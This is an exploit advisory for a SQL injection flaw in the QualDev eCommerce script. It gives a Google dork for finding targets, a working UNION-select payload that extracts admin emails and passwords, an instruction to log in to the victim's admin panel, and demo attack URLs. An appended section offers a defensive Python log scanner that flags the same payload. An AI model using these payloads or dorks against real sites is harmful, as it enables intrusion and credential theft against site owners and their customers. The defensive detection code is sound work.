====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================

# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all versions
# Category: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick[at]xaknet[dot]ru
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER, Kronus, mst && others)

# Intro:
- A parameter is not properly sanitised before being used in a SQL query.
- Input passed to the "id" parameter is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

# Exploit:
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

Log in with the admin email && password here: http://victim/adminpanel/

# Demo:
- http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
- http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

Vizit us at http://xaknet.ru
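
# Added example (not part of the original advisory, and not QualDev code):
A Python check for web access logs that flags index.php?file=allfile requests whose "id" is not a single plain integer, which is the property the injection above relies on. It assumes combined-format access logs and that legitimate ids are short non-negative integers; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are short non-negative integers.
STRICT_INT = re.compile(r"[0-9]{1,10}")

def check_request(target):
    """Return a reason string if the request is suspicious, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("index.php"):
        return None
    # parse_qs URL-decodes values and turns '+' into a space.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "allfile" not in params.get("file", []):
        return None  # a different page; out of scope for this check
    ids = params.get("id", [])
    if len(ids) != 1:
        return "id missing or repeated (%d values)" % len(ids)
    if not STRICT_INT.fullmatch(ids[0]):
        return "id is not a plain integer: %r" % ids[0][:40]
    return None

def scan(lines):
    """Return [(client_ip, reason)] for every flagged access-log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        reason = check_request(match.group(1)) if match else None
        if reason:
            hits.append((line.split(" ", 1)[0], reason))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Dec/2010:10:00:01 +0000] "GET /index.php?file=allfile&id=40 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Dec/2010:10:00:05 +0000] "GET /index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin HTTP/1.1" 200 4811',
    '203.0.113.9 - - [15/Dec/2010:10:00:09 +0000] "GET /index.php?file=allfile&id=7&id=8 HTTP/1.1" 200 5090',
    '198.51.100.7 - - [15/Dec/2010:10:00:12 +0000] "GET /index.php?file=news&id=abc HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The same strict-integer rule belongs in the application itself, applied to "id" before it reaches a parameterised query.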